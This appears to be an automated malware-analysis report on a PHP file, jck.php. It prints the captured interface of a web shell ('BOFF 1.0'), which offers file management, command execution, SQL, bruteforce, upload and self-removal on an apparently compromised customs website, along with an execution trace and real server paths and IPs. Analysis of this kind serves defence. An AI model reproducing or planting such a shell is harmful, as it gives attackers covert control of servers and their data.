PHP Malware Analysis

jck.php

md5: aa471e03f85edaf1642e99180cab45a8

Jump to:

Screenshot


Attributes

Environment

Execution

Title

URLs


Deobfuscated PHP code

          <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>spbrta.customs.ru - BOFF 1.0</title>
<style>
body{background-color:#000028;color:#e1e1e1;}
body,td,th{ border:1px outset black;font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ border-left:5px solid #df5;color:#fff;background-color:#000028; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:7px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#000028;margin:0px; }
div.content{ padding: 7px;margin-left:7px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#003300;}
.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('/spbrta//plugins/editors/jce.php', params);
	}
	function sr(url, params) {	
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux web.master.customs.ru 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015 x86_64 <a href="http://exploit-db.com/list.php?description=Linux+Kernel+2.6.32" target=_blank>[exploit-db.com]</a></nobr><br>48 ( apache ) <span>Group:</span> 48 ( ? )<br>5.3.3 <span>Safe mode:</span> <font color=#00bb00><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2022-01-19 01:02:45<br>393.59 GB <span>Free:</span> 77.88 GB (19%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/var/")'>var/</a><a href='#' onclick='g("FilesMan","/var/www/")'>www/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/")'>customs.rbc.ru/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/")'>spbrta/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/")'>htdocs/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/")'>spbrta/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/")'>plugins/</a><a href='#' onclick='g("FilesMan","/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/")'>editors/</a> <font color=#25ff00>drwxrwxr-x</font> <a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br>172.16.0.2<br><span>Client IP:</span><br>105.112.180.164</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="10%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="10%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="10%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="10%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="10%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="10%">[ <a href="#" onclick="g('SafeMode',null,'','','')">Safe mode</a> ]</th><th width="10%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="10%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="10%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="10%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/..');" title=><b>[ .. ]</b></a></td><td>dir</td><td>2017-04-20 14:25:37</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=#25ff00>drwxrwx---</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jce" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/jce');" title=><b>[ jce ]</b></a></td><td>dir</td><td>2022-01-18 22:46:10</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jce','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jce', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="jck" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/jck');" title=><b>[ jck ]</b></a></td><td>dir</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jck','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jck', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="nab" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/nab');" title=><b>[ nab ]</b></a></td><td>dir</td><td>2018-11-08 23:21:27</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'nab','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'nab', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'nab', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="tinymce" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/tinymce');" title=><b>[ tinymce ]</b></a></td><td>dir</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'tinymce','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'tinymce', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="xstandard" class=chkbx></td><td><a href=# onclick="g('FilesMan','/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/xstandard');" title=><b>[ xstandard ]</b></a></td><td>dir</td><td>2019-06-09 07:42:20</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'xstandard','chmod')"><font color=#25ff00>drwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'xstandard', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="adminsigning.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'adminsigning.zip', 'view')">adminsigning.zip</a></td><td>370.55 KB</td><td>2018-04-19 08:57:45</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'adminsigning.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'adminsigning.zip', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="home.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'home.php', 'view')">home.php</a></td><td>285 B</td><td>2019-01-05 03:01:48</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'home.php','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'home.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'home.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="index.html" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'index.html', 'view')">index.html</a></td><td>44 B</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'index.html','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'index.html', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'index.html', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jce.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jce.php', 'view')">jce.php</a></td><td>25.47 KB</td><td>2018-01-09 18:19:01</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jce.php','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'jce.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jce.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="jce.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jce.xml', 'view')">jce.xml</a></td><td>29.97 KB</td><td>2014-03-25 13:50:01</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jce.xml','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'jce.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jce.xml', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jck.js.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jck.js.php', 'view')">jck.js.php</a></td><td>5.28 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jck.js.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jck.js.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jck.js.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="jck.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jck.php', 'view')">jck.php</a></td><td>21.79 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jck.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jck.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jck.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="jckstyles.xml.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jckstyles.xml.php', 'view')">jckstyles.xml.php</a></td><td>3.72 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jckstyles.xml.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jckstyles.xml.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="jcktemplates.xml.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'jcktemplates.xml.php', 'view')">jcktemplates.xml.php</a></td><td>2.62 KB</td><td>2013-11-07 07:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'jcktemplates.xml.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'jcktemplates.xml.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="midd.png" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'midd.png', 'view')">midd.png</a></td><td>796.23 KB</td><td>2018-03-27 02:54:12</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'midd.png','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'midd.png', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'midd.png', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="none.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'none.php', 'view')">none.php</a></td><td>53.63 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'none.php','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'none.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'none.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="none.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'none.xml', 'view')">none.xml</a></td><td>573 B</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'none.xml','chmod')"><font color=#25ff00>-rwxrwxr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'none.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'none.xml', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="office.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'office.zip', 'view')">office.zip</a></td><td>1.38 MB</td><td>2018-11-19 13:48:12</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'office.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'office.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'office.zip', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="tinymce.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'tinymce.php', 'view')">tinymce.php</a></td><td>20.95 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'tinymce.php','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'tinymce.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="tinymce.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'tinymce.xml', 'view')">tinymce.xml</a></td><td>10.19 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'tinymce.xml','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'tinymce.xml', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="TSB.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'TSB.zip', 'view')">TSB.zip</a></td><td>871.25 KB</td><td>2021-01-18 10:31:40</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'TSB.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'TSB.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'TSB.zip', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="wellss.zip" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'wellss.zip', 'view')">wellss.zip</a></td><td>1.13 MB</td><td>2021-01-20 15:52:36</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'wellss.zip','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'wellss.zip', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'wellss.zip', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="xstandard.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'xstandard.php', 'view')">xstandard.php</a></td><td>148.11 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'xstandard.php','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'xstandard.php', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="xstandard.xml" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'xstandard.xml', 'view')">xstandard.xml</a></td><td>1.10 KB</td><td>2013-11-12 13:59:17</td><td>48/48</td><td><a href=# onclick="g('FilesTools',null,'xstandard.xml','chmod')"><font color=#25ff00>-rw-rwxr--</font></td><td><a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'xstandard.xml', 'download')">D</a></td></tr><tr><td colspan=7>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/'>
	<input type=hidden name=charset value='Windows-1251'>
	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option><option value='tar'>Compress (tar.gz)</option></select>&nbsp;<input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
	<tr>
		<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/'><input type=submit value='>>'></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='#25ff00'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
		<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='#25ff00'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
	</tr><tr>
		<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
		<td><form method='post' ENCTYPE='multipart/form-data'>
		<input type=hidden name=a value='FilesMAn'>
		<input type=hidden name=c value='/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/'>
		<input type=hidden name=p1 value='uploadFile'>
		<input type=hidden name=charset value='Windows-1251'>
		<span>Upload file:</span> <font color='#25ff00'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
	</tr></table></div></body></html>

Execution traces

data/traces/aa471e03f85edaf1642e99180cab45a8_trace-1676255020.1174.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:24:06.015217]
1	0	1	0.000156	393512
1	3	0	0.000258	417608	{main}	1		/var/www/html/uploads/jck.php	0	0
1	3	1	0.000520	434104
			0.000546	314224
TRACE END   [2023-02-13 00:24:06.015637]


Generated HTML code

<html><head><meta http-equiv="Content-Type" content="text/html; charset=Windows-1251"><title>spbrta.customs.ru - BOFF 1.0</title>
<style>
body{background-color:#000028;color:#e1e1e1;}
body,td,th{ border:1px outset black;font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ border-left:5px solid #df5;color:#fff;background-color:#000028; }
span,h1,a{ color: #df5 !important; }
span{ font-weight: bolder; }
h1{ border-left:7px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#000028;margin:0px; }
div.content{ padding: 7px;margin-left:7px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#003300;}
.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '/var/www/customs.rbc.ru/spbrta/htdocs/spbrta/plugins/editors/';
    var a_ = 'FilesMan'
    var charset_ = 'Windows-1251';
    var p1_ = '';
    var p2_ = '';
    var p3_ = '';
    var d = document;
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
		sr('/spbrta//plugins/editors/jce.php', params);
	}
	function sr(url, params) {	
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert('Request error!');
	}
</script>
</head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c">
<input type="hidden" name="p1">
<input type="hidden" name="p2">
<input type="hidden" name="p3">
<input type="hidden" name="charset">
</form><table class="info" cellpadding="3" cellspacing="0" width="100%"><tbody><tr><td width="1"><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux web.master.customs.ru 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015 x86_64 <a href="http://exploit-db.com/list.php?description=Linux+Kernel+2.6.32" target="_blank">[exploit-db.com]</a></nobr><br>48 ( apache ) <span>Group:</span> 48 ( ? )<br>5.3.3 <span>Safe mode:</span> <font color="#00bb00"><b>OFF</b></font> <a href="#" onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2022-01-19 01:02:45<br>393.59 GB <span>Free:</span> 77.88 GB (19%)<br><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/&quot;)">/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/&quot;)">var/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/&quot;)">www/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/customs.rbc.ru/&quot;)">customs.rbc.ru/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/customs.rbc.ru/spbrta/&quot;)">spbrta/</a><a href="#" onclick="g(&quot;FilesMan&quot;,&quot;/var/www/customs.rbc.ru/spbrta/htdocs/&quot;)">htdocs/</a><a href="#" 